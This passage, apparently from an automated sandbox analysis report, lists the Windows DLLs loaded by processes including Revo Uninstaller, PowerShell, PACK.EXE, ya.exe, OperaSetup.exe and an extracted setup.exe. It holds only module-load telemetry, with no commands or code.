        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dwmapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wbemcomn.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mswsock.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dnsapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rasadhlp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: amsi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: userenv.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: profapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sspicli.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: cryptsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-localization-l1-2-1.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dxgidebug.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: pcacli.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.fileexplorer.common.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: ntshrui.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: cscapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: linkinfo.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: oleacc.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\Downloads\OperaSetup.exeSection loaded: apphelp.dll
        Source: C:\Users\user\Downloads\OperaSetup.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: acgenral.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: samcli.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: msimg32.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: dbghelp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: dbgcore.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: mskeyprotect.dll
